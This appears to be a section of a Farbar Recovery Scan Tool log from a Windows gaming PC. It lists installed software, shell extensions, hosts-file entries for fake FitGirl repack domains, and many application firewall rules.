Mozilla Maintenance Service (HKLM\...\MozillaMaintenanceService) (Version: 71.0 - Mozilla)
MSI Afterburner 4.6.2 (HKLM-x32\...\Afterburner) (Version: 4.6.2 - MSI Co., LTD)
Notepad++ (64-bit x64) (HKLM\...\Notepad++) (Version: 7.8.1 - Notepad++ Team)
NVAPI Monitor plugin for NvContainer (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_NvContainer.NvapiMonitor) (Version: 1.19 - NVIDIA Corporation) Hidden
NVIDIA GeForce Experience 3.20.2.34 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.GFExperience) (Version: 3.20.2.34 - NVIDIA Corporation)
NVIDIA Graphics Driver 445.75 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Driver) (Version: 445.75 - NVIDIA Corporation)
NVIDIA HD Audio Driver 1.3.38.26 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_HDAudio.Driver) (Version: 1.3.38.26 - NVIDIA Corporation)
NVIDIA PhysX System Software 9.19.0218 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.PhysX) (Version: 9.19.0218 - NVIDIA Corporation)
Paradox Launcher v2 (HKLM\...\{BA8E5744-1CA9-41D1-98D4-09029A919D3B}) (Version: 2.0.2.0 - Paradox Interactive)
Promontory_GPIO Driver (HKLM-x32\...\{B5512BCC-F4CD-4159-86A4-B2AD7D38FFA9}) (Version: 2.0.1.0 - Advanced Micro Devices, Inc.) Hidden
Rags Suite (HKLM-x32\...\{7C60776C-C6EA-4C59-926B-BA76703D2608}) (Version: 2.4.16 - RagsGame)
Realtek Ethernet Controller Driver (HKLM-x32\...\{8833FFB6-5B0C-4764-81AA-06DFEED9A476}) (Version: 10.35.510.2019 - Realtek)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.8858.1 - Realtek Semiconductor Corp.)
Red Dead Redemption 2 (HKLM-x32\...\Red Dead Redemption 2) (Version: 1.0.1232.40 - Rockstar Games)
RivaTuner Statistics Server 7.2.3 (HKLM-x32\...\RTSS) (Version: 7.2.3 - Unwinder)
Roblox Player for r_omi (HKU\S-1-5-21-173970672-666801694-2624729176-1001\...\roblox-player) (Version:  - Roblox Corporation)
Rockstar Games Launcher (HKLM-x32\...\Rockstar Games Launcher) (Version: 1.0.19.234 - Rockstar Games)
Rockstar Games Social Club (HKLM-x32\...\Rockstar Games Social Club) (Version: 2.0.5.2 - Rockstar Games)
SHOUTcast Source DSP Plug-in v2 (HKLM-x32\...\SHOUTcast Source DSP) (Version: 2.3.5.222 - Radionomy SA)
Starsector by Fractal Softworks LLC (HKLM-x32\...\Starsector) (Version:  - )
Steam (HKLM-x32\...\Steam) (Version: 2.10.91.91 - Valve Corporation)
Stellaris (HKLM-x32\...\1508702879_is1) (Version: 2.6.1.1 - GOG.com)
Stellaris: Ancient Relics (HKLM-x32\...\2106739867_is1) (Version: 2.6.1.1 - GOG.com)
Stellaris: Anniversary Portraits (HKLM-x32\...\1619776270_is1) (Version: 2.6.1.1 - GOG.com)
Stellaris: Apocalypse (HKLM-x32\...\1988097366_is1) (Version: 2.6.1.1 - GOG.com)
Stellaris: Arachnoid Portrait Pack (HKLM-x32\...\1897107160_is1) (Version: 2.6.1.1 - GOG.com)
Stellaris: Distant Stars Story Pack (HKLM-x32\...\1209094315_is1) (Version: 2.6.1.1 - GOG.com)
Stellaris: Federations (HKLM-x32\...\1790030450_is1) (Version: 2.6.1.1 - GOG.com)
Stellaris: Horizon Signal (HKLM-x32\...\1490429179_is1) (Version: 2.6.1.1 - GOG.com)
Stellaris: Humanoids Species Pack (HKLM-x32\...\2062279897_is1) (Version: 2.6.1.1 - GOG.com)
Stellaris: Leviathans Story Pack (HKLM-x32\...\1122806862_is1) (Version: 2.6.1.1 - GOG.com)
Stellaris: Lithoids Species Pack (HKLM-x32\...\1420212493_is1) (Version: 2.6.1.1 - GOG.com)
Stellaris: Megacorp (HKLM-x32\...\1316465607_is1) (Version: 2.6.1.1 - GOG.com)
Stellaris: Plantoids Species Pack (HKLM-x32\...\1999794856_is1) (Version: 2.6.1.1 - GOG.com)
Stellaris: Synthetic Dawn Story Pack (HKLM-x32\...\1292954230_is1) (Version: 2.6.1.1 - GOG.com)
Stellaris: Utopia (HKLM-x32\...\1978231244_is1) (Version: 2.6.1.1 - GOG.com)
Winamp (HKLM-x32\...\Winamp) (Version: 5.8  - Winamp SA)
WinRAR 5.80 beta 4 (64-bit) (HKLM\...\WinRAR archiver) (Version: 5.80.4 - win.rar GmbH)
X4: Foundations (HKLM-x32\...\X4: Foundations_is1) (Version:  - )
Candy Crush Friends -> C:\Program Files\WindowsApps\king.com.CandyCrushFriends_1.34.6.0_x86__kgqvnymyfvs32 [2020-04-10] (king.com)
Farm Heroes Saga -> C:\Program Files\WindowsApps\king.com.FarmHeroesSaga_5.34.8.0_x86__kgqvnymyfvs32 [2020-03-18] (king.com)
Forza Horizon 4 -> D:\Games\Forza Horizon 4\FH4 [2020-01-09] (Microsoft Studios)
Forza Horizon 4 Fortune Island -> D:\Games\Forza Horizon 4\FH4_FortuneIsland [2020-01-09] (Microsoft Studios)
Forza Horizon 4 LEGO Speed Champions -> D:\Games\Forza Horizon 4\FH4_Lego [2020-01-09] (Microsoft Studios)
Microsoft Advertising SDK for XAML -> C:\Program Files\WindowsApps\Microsoft.Advertising.Xaml_10.1811.1.0_x64__8wekyb3d8bbwe [2019-12-03] (Microsoft Corporation) [MS Ad]
Microsoft Advertising SDK for XAML -> C:\Program Files\WindowsApps\Microsoft.Advertising.Xaml_10.1811.1.0_x86__8wekyb3d8bbwe [2019-12-03] (Microsoft Corporation) [MS Ad]
Microsoft Solitaire Collection -> C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_4.6.1224.0_x64__8wekyb3d8bbwe [2020-03-26] (Microsoft Studios) [MS Ad]
MSN Weather -> C:\Program Files\WindowsApps\Microsoft.BingWeather_4.36.20714.0_x64__8wekyb3d8bbwe [2020-03-25] (Microsoft Corporation) [MS Ad]
NVIDIA Control Panel -> C:\Program Files\WindowsApps\NVIDIACorp.NVIDIAControlPanel_8.1.956.0_x64__56jybvy8sckqj [2019-12-03] (NVIDIA Corp.)
Realtek Audio Control -> C:\Program Files\WindowsApps\RealtekSemiconductorCorp.RealtekAudioControl_1.9.205.0_x64__dt26b99r8h8gj [2020-02-08] (Realtek Semiconductor Corp)
==================== Custom CLSID (Whitelisted): ==============
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
CustomCLSID: HKU\S-1-5-21-173970672-666801694-2624729176-1001_Classes\CLSID\{46406D82-6EC0-47CC-8A75-1F33C6DEDBBE}\InprocServer32 -> C:\Users\r_omi\AppData\Local\Google\Update\1.3.35.442\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-173970672-666801694-2624729176-1001_Classes\CLSID\{540C17A8-04F2-4B66-95D7-B2FEF9A19B54}\InprocServer32 -> C:\Users\r_omi\AppData\Local\Google\Update\1.3.35.422\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-173970672-666801694-2624729176-1001_Classes\CLSID\{84EB3779-151B-4C71-AEF0-A0FEE9481401}\InprocServer32 -> C:\Users\r_omi\AppData\Local\Google\Update\1.3.35.342\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-173970672-666801694-2624729176-1001_Classes\CLSID\{A2C6CB58-C076-425C-ACB7-6D19D64428CD}\localserver32 -> C:\Users\r_omi\AppData\Local\Google\Chrome\Application\80.0.3987.163\notification_helper.exe (Google LLC -> Google LLC)
CustomCLSID: HKU\S-1-5-21-173970672-666801694-2624729176-1001_Classes\CLSID\{E8CF3E55-F919-49D9-ABC0-948E6CB34B9F}\InprocServer32 -> C:\Users\r_omi\AppData\Local\Google\Update\1.3.35.452\psuser_64.dll (Google LLC -> Google LLC)
CustomCLSID: HKU\S-1-5-21-173970672-666801694-2624729176-1001_Classes\CLSID\{E9E7529D-7F09-410B-AF2A-CC154473B19C}\InprocServer32 -> C:\Users\r_omi\AppData\Local\Google\Update\1.3.35.452\psuser_64.dll (Google LLC -> Google LLC)
ShellIconOverlayIdentifiers: [ IDM Shell Extension] -> {CDC95B92-E27C-4745-A8C5-64A52A78855D} => D:\Program Files\Internet Download Manager\IDMShellExt64.dll [2019-05-02] (Tonec Inc. -> Tonec Inc.)
ContextMenuHandlers1: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => C:\Program Files\7-Zip\7-zip.dll [2019-02-21] (Igor Pavlov) [File not signed]
ContextMenuHandlers1: [ANotepad++64] -> {B298D29A-A6ED-11DE-BA8C-A68E55D89593} => D:\Program Files\Notepad++\NppShell_06.dll [2019-10-28] (Notepad++ -> )
ContextMenuHandlers1: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2019-11-17] (win.rar GmbH -> Alexander Roshal)
ContextMenuHandlers1-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext32.dll [2019-11-17] (win.rar GmbH -> Alexander Roshal)
ContextMenuHandlers4: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => C:\Program Files\7-Zip\7-zip.dll [2019-02-21] (Igor Pavlov) [File not signed]
ContextMenuHandlers5: [NvCplDesktopContext] -> {3D1975AF-48C6-4f8e-A182-BE0E08FA86A9} => C:\Windows\System32\DriverStore\FileRepository\nv_dispi.inf_amd64_e0a5a1b06de180e3\nvshext.dll [2020-03-19] (NVIDIA Corporation -> NVIDIA Corporation)
ContextMenuHandlers6: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => C:\Program Files\7-Zip\7-zip.dll [2019-02-21] (Igor Pavlov) [File not signed]
ContextMenuHandlers6: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2019-11-17] (win.rar GmbH -> Alexander Roshal)
ContextMenuHandlers6-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext32.dll [2019-11-17] (win.rar GmbH -> Alexander Roshal)
==================== Codecs (Whitelisted) ====================
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
HKLM\...\Drivers32: [VIDC.RTV1] => C:\Windows\system32\rtvcvfw64.dll [246272 2012-09-29] () [File not signed]
HKLM\...\Drivers32: [VIDC.RTV1] => C:\Windows\SysWOW64\rtvcvfw32.dll [247296 2012-09-29] () [File not signed]
==================== Shortcuts & WMI ========================
(The entries could be listed to be restored or removed.)
ShortcutWithArgument: C:\Users\r_omi\Desktop\Chrome Remote Desktop.lnk -> C:\Users\r_omi\AppData\Local\Google\Chrome\Application\chrome_proxy.exe (Google LLC) ->  --profile-directory=Default --app-id=efmjfjelnicpmdcmfikempdhlmainjcb
ShortcutWithArgument: C:\Users\r_omi\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Chrome Remote Desktop (1).lnk -> C:\Users\r_omi\AppData\Local\Google\Chrome\Application\chrome_proxy.exe (Google LLC) ->  --profile-directory=Default --app-id=efmjfjelnicpmdcmfikempdhlmainjcb
ShortcutWithArgument: C:\Users\r_omi\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Chrome Remote Desktop.lnk -> C:\Users\r_omi\AppData\Local\Google\Chrome\Application\chrome_proxy.exe (Google LLC) ->  --profile-directory=Default --app-id=gbchcmhmhahfdphkhkmpfmihenigjmpp
==================== Loaded Modules (Whitelisted) =============
2019-10-26 18:04 - 2019-10-26 18:04 - 000232960 _____ () [File not signed] C:\Program Files (x86)\MSI Afterburner\RTCore.dll
2019-10-26 18:03 - 2019-10-26 18:03 - 000057344 _____ () [File not signed] C:\Program Files (x86)\MSI Afterburner\RTFC.dll
2019-10-26 18:04 - 2019-10-26 18:04 - 000650240 _____ () [File not signed] C:\Program Files (x86)\MSI Afterburner\RTHAL.dll
2019-10-26 18:03 - 2019-10-26 18:03 - 000074240 _____ () [File not signed] C:\Program Files (x86)\MSI Afterburner\RTMUI.dll
2019-10-26 18:03 - 2019-10-26 18:03 - 000369664 _____ () [File not signed] C:\Program Files (x86)\MSI Afterburner\RTUI.dll
2019-12-03 22:55 - 2019-02-21 23:00 - 000078336 _____ (Igor Pavlov) [File not signed] C:\Program Files\7-Zip\7-zip.dll
2019-12-23 21:16 - 2019-12-23 21:16 - 001655296 _____ (Microsoft Corporation) [File not signed] C:\Windows\WinSxS\amd64_microsoft.vc80.mfc_1fc8b3b9a1e18e3b_8.0.50727.4053_none_8444db7d32915e4c\MFC80U.DLL
2019-12-23 21:16 - 2019-12-23 21:16 - 000047104 _____ (Microsoft Corporation) [File not signed] C:\Windows\WinSxS\amd64_microsoft.vc80.mfcloc_1fc8b3b9a1e18e3b_8.0.50727.4053_none_bc1d1e5b0be08790\MFC80ENU.DLL
2020-04-04 00:31 - 2010-03-31 04:56 - 000249856 _____ (Mozilla Foundation) [File not signed] C:\Program Files (x86)\Common Files\LaunchpadWeb\freebl3.dll
2020-04-04 00:31 - 2010-03-31 04:56 - 000098304 _____ (Mozilla Foundation) [File not signed] C:\Program Files (x86)\Common Files\LaunchpadWeb\nssdbm3.dll
2020-04-04 00:31 - 2010-03-31 04:56 - 000155648 _____ (Mozilla Foundation) [File not signed] C:\Program Files (x86)\Common Files\LaunchpadWeb\softokn3.dll
2019-12-03 22:24 - 2017-07-19 16:02 - 000236032 _____ (Thesycon Software Solutions GmbH & Co. KG) [File not signed] C:\Program Files\FiiO\FiiO_Driver\W10_x64\fiio_usbaudioapi.dll
==================== Alternate Data Streams (Whitelisted) ========
(If an entry is included in the fixlist, only the ADS will be removed.)
AlternateDataStreams: C:\Users\r_omi\Application Data:00e481b5e22dbe1f649fcddd505d3eb7 [394]
AlternateDataStreams: C:\Users\r_omi\Application Data:ec1be289b1dc3f0834b6b7f0a7240eb6 [362]
AlternateDataStreams: C:\Users\r_omi\Application Data:fbd50e2f7662a5c33287ddc6e65ab5a1 [394]
AlternateDataStreams: C:\Users\r_omi\AppData\Roaming:00e481b5e22dbe1f649fcddd505d3eb7 [394]
AlternateDataStreams: C:\Users\r_omi\AppData\Roaming:ec1be289b1dc3f0834b6b7f0a7240eb6 [362]
AlternateDataStreams: C:\Users\r_omi\AppData\Roaming:fbd50e2f7662a5c33287ddc6e65ab5a1 [394]
==================== Safe Mode (Whitelisted) ==================
==================== Association (Whitelisted) =================
==================== Internet Explorer trusted/restricted ==========
==================== Hosts content: =========================
(If needed Hosts: directive could be included in the fixlist to reset Hosts.)
2019-03-19 11:49 - 2020-03-19 22:25 - 000001256 _____ C:\Windows\system32\drivers\etc\hosts
109.94.209.70      fitgirlrepacks.co               # Fake FitGirl site
109.94.209.70      fitgirl-repacks.cc              # Fake FitGirl site
109.94.209.70      fitgirl-repack.com              # Fake FitGirl site
109.94.209.70      www.fitgirlrepacks.co           # Fake FitGirl site
109.94.209.70      www.fitgirl-repacks.cc          # Fake FitGirl site
109.94.209.70      www.fitgirl-repack.com          # Fake FitGirl site
==================== Other Areas ===========================
(Currently there is no automatic fix for this section.)
HKLM\System\CurrentControlSet\Control\Session Manager\Environment\\Path -> C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Program Files (x86)\NVIDIA Corporation\PhysX\Common;C:\Program Files\NVIDIA Corporation\NVIDIA NvDLISR
HKU\S-1-5-21-173970672-666801694-2624729176-1001\Control Panel\Desktop\\Wallpaper -> 
DNS Servers: 115.178.58.26 - 115.178.58.10
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 0) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer => (SmartScreenEnabled: )
Windows Firewall is enabled.
==================== MSCONFIG/TASK MANAGER disabled items ==
==================== FirewallRules (Whitelisted) ================
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
FirewallRules: [{182CE55F-019F-4262-907C-E0C1C7771434}] => (Allow) C:\Program Files\Mozilla Firefox\firefox.exe (Mozilla Corporation -> Mozilla Corporation)
FirewallRules: [{A30C73E6-83D5-4D0F-A61D-395D4395AB54}] => (Allow) C:\Program Files\Mozilla Firefox\firefox.exe (Mozilla Corporation -> Mozilla Corporation)
FirewallRules: [{021A2972-9A25-4ED9-9D35-E22CEFC3E81B}] => (Allow) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe (NVIDIA Corporation -> NVIDIA Corporation)
FirewallRules: [{4DC1F45C-180F-42F5-A7FC-5E18C1DAE51A}] => (Allow) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe (NVIDIA Corporation -> NVIDIA Corporation)
FirewallRules: [{9B5E0D20-1115-479C-96C4-8154A9282247}] => (Allow) D:\Steam\Steam.exe No File
FirewallRules: [{C24CBF5A-F321-441C-923E-2B6F3127A0FA}] => (Allow) D:\Steam\Steam.exe No File
FirewallRules: [{5B6523EE-C208-4DA5-B7D4-A9747EE251AC}] => (Allow) D:\Steam\bin\cef\cef.win7\steamwebhelper.exe No File
FirewallRules: [{C8098259-EC88-409D-B955-49EE58BA0261}] => (Allow) D:\Steam\bin\cef\cef.win7\steamwebhelper.exe No File
FirewallRules: [TCP Query User{106C1A7C-A60F-4458-811C-B68F396B0C60}C:\program files\lghub\lghub_agent.exe] => (Block) C:\program files\lghub\lghub_agent.exe (Logitech Inc -> Logitech, Inc.)
FirewallRules: [UDP Query User{1B89567F-A6A8-4C55-815C-F5A1BB5643DE}C:\program files\lghub\lghub_agent.exe] => (Block) C:\program files\lghub\lghub_agent.exe (Logitech Inc -> Logitech, Inc.)
FirewallRules: [{0EED8287-82A1-4E4D-8BC0-C712CC35DD4E}] => (Allow) D:\Steam\steamapps\common\War Thunder\launcher.exe No File
FirewallRules: [{6CEAAD03-63FD-4641-B498-52EEF6DD3001}] => (Allow) D:\Steam\steamapps\common\War Thunder\launcher.exe No File
FirewallRules: [TCP Query User{ED2DC4C3-0C3F-424E-951B-39B2685EC8F3}E:\tixati_portable\tixati_windows64bit.exe] => (Allow) E:\tixati_portable\tixati_windows64bit.exe No File
FirewallRules: [UDP Query User{77A18752-F0EA-4DB8-8228-499320E9D16C}E:\tixati_portable\tixati_windows64bit.exe] => (Allow) E:\tixati_portable\tixati_windows64bit.exe No File
FirewallRules: [{BC9E5DAD-5BA0-4CE8-8020-71A62B8D9BF6}] => (Allow) D:\Program Files\Steam\Steam.exe (Valve -> Valve Corporation)
FirewallRules: [{3712BE5E-EA84-491E-8E7C-9B0385202E23}] => (Allow) D:\Program Files\Steam\Steam.exe (Valve -> Valve Corporation)
FirewallRules: [{A825E6D0-B13C-4387-832D-3A84F21686EE}] => (Allow) D:\Program Files\Steam\bin\cef\cef.win7\steamwebhelper.exe (Valve -> Valve Corporation)
FirewallRules: [{670771C6-DDA4-4F1B-B793-B4041F0AAC2A}] => (Allow) D:\Program Files\Steam\bin\cef\cef.win7\steamwebhelper.exe (Valve -> Valve Corporation)
FirewallRules: [TCP Query User{802B797F-A7C2-49C1-B7D9-D98335060497}D:\program files\steam\steamapps\common\war thunder\win64\aces.exe] => (Block) D:\program files\steam\steamapps\common\war thunder\win64\aces.exe No File
FirewallRules: [UDP Query User{E02A665A-0EC6-4053-B5A2-9E41D46A4438}D:\program files\steam\steamapps\common\war thunder\win64\aces.exe] => (Block) D:\program files\steam\steamapps\common\war thunder\win64\aces.exe No File
FirewallRules: [TCP Query User{69012A07-3D0F-4128-AC5C-37029F5A64DA}D:\games\star wars jedi - fallen order\swgame\binaries\win64\starwarsjedifallenorder.exe] => (Block) D:\games\star wars jedi - fallen order\swgame\binaries\win64\starwarsjedifallenorder.exe No File
FirewallRules: [UDP Query User{D35DC9E9-3362-4DDA-8A76-C9D79D9B97BA}D:\games\star wars jedi - fallen order\swgame\binaries\win64\starwarsjedifallenorder.exe] => (Block) D:\games\star wars jedi - fallen order\swgame\binaries\win64\starwarsjedifallenorder.exe No File
FirewallRules: [TCP Query User{09E0B52A-76AE-4BD7-AA8E-420BBD02D541}C:\users\r_omi\appdata\local\google\chrome\application\chrome.exe] => (Block) C:\users\r_omi\appdata\local\google\chrome\application\chrome.exe (Google LLC -> Google LLC)
FirewallRules: [UDP Query User{5892BD5E-412C-4194-B75F-EC2AF3CDB647}C:\users\r_omi\appdata\local\google\chrome\application\chrome.exe] => (Block) C:\users\r_omi\appdata\local\google\chrome\application\chrome.exe (Google LLC -> Google LLC)
FirewallRules: [TCP Query User{A9DA2324-FCEA-434D-AF4D-42912FBF8C76}D:\program files\steam\steamapps\common\squad\squadgame\binaries\win64\squadgame.exe] => (Block) D:\program files\steam\steamapps\common\squad\squadgame\binaries\win64\squadgame.exe No File
FirewallRules: [UDP Query User{AEBF6442-5A28-47C9-BF8F-3BB8D4B95851}D:\program files\steam\steamapps\common\squad\squadgame\binaries\win64\squadgame.exe] => (Block) D:\program files\steam\steamapps\common\squad\squadgame\binaries\win64\squadgame.exe No File
FirewallRules: [{745FB8A5-CD28-4694-8C38-D514FBD0E462}] => (Allow) D:\Program Files\Steam\bin\cef\cef.win7x64\steamwebhelper.exe No File
FirewallRules: [{1651B606-8B81-4E61-89F0-0ED724019ABD}] => (Allow) D:\Program Files\Steam\bin\cef\cef.win7x64\steamwebhelper.exe No File
FirewallRules: [TCP Query User{8D8916FF-444D-4604-8383-427E17F8A9CF}D:\games\transport fever 2\transportfever2.exe] => (Block) D:\games\transport fever 2\transportfever2.exe No File
FirewallRules: [UDP Query User{261B334E-2FDB-4D1C-9A2D-D0CC12E1CE54}D:\games\transport fever 2\transportfever2.exe] => (Block) D:\games\transport fever 2\transportfever2.exe No File
FirewallRules: [{41D563CE-5986-4253-B2A6-CB57DC284812}] => (Allow) C:\Program Files\Rockstar Games\Red Dead Redemption 2\RDR2.exe (Rockstar Games, Inc. -> Rockstar Games)
FirewallRules: [{8BD648CC-D6AD-4177-B1DD-D5DBF4C30D09}] => (Allow) C:\Program Files\Rockstar Games\Red Dead Redemption 2\RDR2.exe (Rockstar Games, Inc. -> Rockstar Games)
FirewallRules: [TCP Query User{F18FBC2F-5EC9-4F2A-8CEA-44DCE2059AEA}D:\downloads\pandownload\pandata\aria2c.exe] => (Block) D:\downloads\pandownload\pandata\aria2c.exe No File
FirewallRules: [UDP Query User{62DDA1BA-44FC-47AF-B41A-D653D0A7CC77}D:\downloads\pandownload\pandata\aria2c.exe] => (Block) D:\downloads\pandownload\pandata\aria2c.exe No File
FirewallRules: [{3C6DD3FA-ED38-4794-A51D-B2B98399B97A}] => (Allow) C:\Program Files (x86)\Garena\Garena\2.0.1909.2618\gxxsvc.exe No File
FirewallRules: [TCP Query User{F23D2FB5-747D-4AE8-9004-4A8DD0EC7CA1}D:\games\32844\shadowtrackerextra\binaries\win64\pubglite-win64-shipping.exe] => (Block) D:\games\32844\shadowtrackerextra\binaries\win64\pubglite-win64-shipping.exe No File
FirewallRules: [UDP Query User{CFFA7444-1D27-4D55-8EE6-12FA8F30B259}D:\games\32844\shadowtrackerextra\binaries\win64\pubglite-win64-shipping.exe] => (Block) D:\games\32844\shadowtrackerextra\binaries\win64\pubglite-win64-shipping.exe No File
FirewallRules: [TCP Query User{86040B6C-9658-4674-8D48-C11DD72E1C28}D:\program files\steam\steamapps\common\war thunder\win64\aces.exe] => (Block) D:\program files\steam\steamapps\common\war thunder\win64\aces.exe No File
FirewallRules: [UDP Query User{F57CEC53-EA5A-4EEA-A27F-AED8DE439BA6}D:\program files\steam\steamapps\common\war thunder\win64\aces.exe] => (Block) D:\program files\steam\steamapps\common\war thunder\win64\aces.exe No File
FirewallRules: [TCP Query User{AFABE174-4032-47B5-9C4A-04E45FD21DBE}C:\program files\lghub\lghub_agent.exe] => (Block) C:\program files\lghub\lghub_agent.exe (Logitech Inc -> Logitech, Inc.)
FirewallRules: [UDP Query User{DCC6B781-22CD-4DE9-874F-DE2F63DEEDEA}C:\program files\lghub\lghub_agent.exe] => (Block) C:\program files\lghub\lghub_agent.exe (Logitech Inc -> Logitech, Inc.)
FirewallRules: [TCP Query User{B8282D30-5E87-4D00-8B7E-00409070F047}C:\users\r_omi\appdata\local\google\chrome\application\chrome.exe] => (Block) C:\users\r_omi\appdata\local\google\chrome\application\chrome.exe (Google LLC -> Google LLC)
FirewallRules: [UDP Query User{45BD5BA0-35CC-46A7-9471-246313F472E4}C:\users\r_omi\appdata\local\google\chrome\application\chrome.exe] => (Block) C:\users\r_omi\appdata\local\google\chrome\application\chrome.exe (Google LLC -> Google LLC)
FirewallRules: [{3B2F4B9A-1B19-426E-BD9D-E819E323FF93}] => (Allow) C:\Program Files (x86)\Google\Chrome Remote Desktop\79.0.3945.10\remoting_host.exe (Google LLC -> Google Inc.)
FirewallRules: [{DDB0B5CA-DA6B-4BC2-9E66-204EB88E40B1}] => (Allow) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe (NVIDIA Corporation -> NVIDIA Corporation)
FirewallRules: [{19415305-8053-47C6-B61B-4A09FBF7B0A7}] => (Allow) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe (NVIDIA Corporation -> NVIDIA Corporation)
FirewallRules: [{F7AEF4A5-6BA3-4EC5-B1BC-174EBEFD46D0}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe (NVIDIA Corporation -> NVIDIA Corporation)
FirewallRules: [{6EFC342E-CCF4-4CBE-8A7D-B73C26B09174}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe (NVIDIA Corporation -> NVIDIA Corporation)
FirewallRules: [{C49EDD16-0316-4D3C-916A-3075DE25ADB9}] => (Block) D:\Games\Forza Horizon 4\FH4\Microsoft.SunriseBaseGame_1.332.904.2_x64__8wekyb3d8bbwe.exe No File
FirewallRules: [{43073E82-89F4-4DB1-BAB6-F1D202DBD934}] => (Block) D:\Games\Forza Horizon 4\FH4\Microsoft.SunriseBaseGame_1.332.904.2_x64__8wekyb3d8bbwe.exe No File
FirewallRules: [TCP Query User{28982854-2126-4462-8DCF-2FBBD837A024}D:\program files\shoutcast\sc_serv.exe] => (Allow) D:\program files\shoutcast\sc_serv.exe No File
FirewallRules: [UDP Query User{147E9954-8F74-4142-A59C-5531B3DC7738}D:\program files\shoutcast\sc_serv.exe] => (Allow) D:\program files\shoutcast\sc_serv.exe No File
FirewallRules: [{BE1D5FCC-B078-471F-872D-619E25836CDC}] => (Allow) D:\Program Files\Winamp\winamp.exe (Winamp SA -> Winamp SA)
FirewallRules: [{6C380A3A-ECEC-4B7E-869D-EAC4937CC4A5}] => (Allow) D:\Program Files\Winamp\winamp.exe (Winamp SA -> Winamp SA)
FirewallRules: [{D41B1F86-7B52-4227-B213-64B65A0B562F}] => (Block) D:\Games\Forza Horizon 4\FH4\Microsoft.SunriseBaseGame_1.332.904.2_x64__8wekyb3d8bbwe.exe No File
FirewallRules: [{7038D917-7B99-4643-986D-E65FB9A78110}] => (Block) D:\Games\Forza Horizon 4\FH4\Microsoft.SunriseBaseGame_1.332.904.2_x64__8wekyb3d8bbwe.exe No File
FirewallRules: [TCP Query User{22DB1287-4DFA-43EC-BFB6-03E1F21789FB}D:\games\paranoia - happiness is mandatory\paranoia.exe] => (Block) D:\games\paranoia - happiness is mandatory\paranoia.exe No File
FirewallRules: [UDP Query User{CD69CB50-1F32-42D9-B764-D6002A8C9477}D:\games\paranoia - happiness is mandatory\paranoia.exe] => (Block) D:\games\paranoia - happiness is mandatory\paranoia.exe No File
FirewallRules: [TCP Query User{6EE9436F-7FDF-4651-879C-B61D1BDE7B9C}D:\games\football manager 2019\fm.exe] => (Block) D:\games\football manager 2019\fm.exe No File
FirewallRules: [UDP Query User{8BC6CB48-8379-43FA-B136-5E07BC19666F}D:\games\football manager 2019\fm.exe] => (Block) D:\games\football manager 2019\fm.exe No File
FirewallRules: [TCP Query User{19BC9B37-9625-4A39-8F3A-21FE4C9FFE19}C:\games\football manager 2019\fm.exe] => (Block) C:\games\football manager 2019\fm.exe (Sports Interactive) [File not signed]
FirewallRules: [UDP Query User{6490B542-4680-4105-B835-08AF10644B39}C:\games\football manager 2019\fm.exe] => (Block) C:\games\football manager 2019\fm.exe (Sports Interactive) [File not signed]
FirewallRules: [TCP Query User{1DB1A8F5-DD40-4F04-BA46-0CAF70B0D5A9}D:\games\32844\shadowtrackerextra\binaries\win64\pubglite-win64-shipping.exe] => (Block) D:\games\32844\shadowtrackerextra\binaries\win64\pubglite-win64-shipping.exe No File
FirewallRules: [UDP Query User{DB8FC6F9-05D9-4ED7-ABC8-6ABCE8FEF316}D:\games\32844\shadowtrackerextra\binaries\win64\pubglite-win64-shipping.exe] => (Block) D:\games\32844\shadowtrackerextra\binaries\win64\pubglite-win64-shipping.exe No File
FirewallRules: [TCP Query User{228E0304-A58B-4C71-A8FB-9BBD5BE52D69}D:\program files\steam\steamapps\common\pubg\tslgame\binaries\win64\tslgame.exe] => (Block) D:\program files\steam\steamapps\common\pubg\tslgame\binaries\win64\tslgame.exe No File
